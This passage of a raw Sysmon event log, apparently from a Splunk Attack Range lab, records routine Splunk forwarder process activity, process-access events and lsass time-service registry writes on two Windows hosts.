Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017130Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:29.127{E5A8D418-E4FD-63C7-1102-00000000B002}2416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.663{FE4C2B44-E4FE-63C7-5A06-00000000AF02}53406224C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000017173Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.612{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=C9602A324DFC1C68FF6B28086186F3B4,SHA256=01CDCB1BF25A0B678E5010B7B0159F47D18418D1F6E2B42CCAFDE88873987BC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017172Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.470{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4FE-63C7-1302-00000000B002}3544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017171Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.468{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017170Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.468{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017169Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.468{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017168Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.468{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017167Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E4FE-63C7-1302-00000000B002}3544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017166Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017165Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017164Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017163Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017162Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017161Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4FE-63C7-1302-00000000B002}3544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017160Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.467{E5A8D418-E4FE-63C7-1302-00000000B002}3544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017159Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.206{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99D5820FE2A34CBF5F437AEFC1A556B6,SHA256=FD89B3652D550D44B8FB45223DA27F4D34A574E1329339E473217F89CD772D0A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000017158Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:30.003{E5A8D418-E4FD-63C7-1202-00000000B002}7122400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000044497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000044496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002b2db6) 13241300x800000000000000044495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2f-0x6e34e016) 13241300x800000000000000044494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0xcff94816) 13241300x800000000000000044493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b40-0x31bdb016) 13241300x800000000000000044492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000044491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x002b2db6) 13241300x800000000000000044490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2f-0x6e34e016) 13241300x800000000000000044489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0xcff94816) 13241300x800000000000000044488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-SetValue2023-01-18 12:24:30.560{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b40-0x31bdb016) 10341000x800000000000000044487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4FE-63C7-5A06-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E4FE-63C7-5A06-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:30.475{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4FE-63C7-5A06-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program 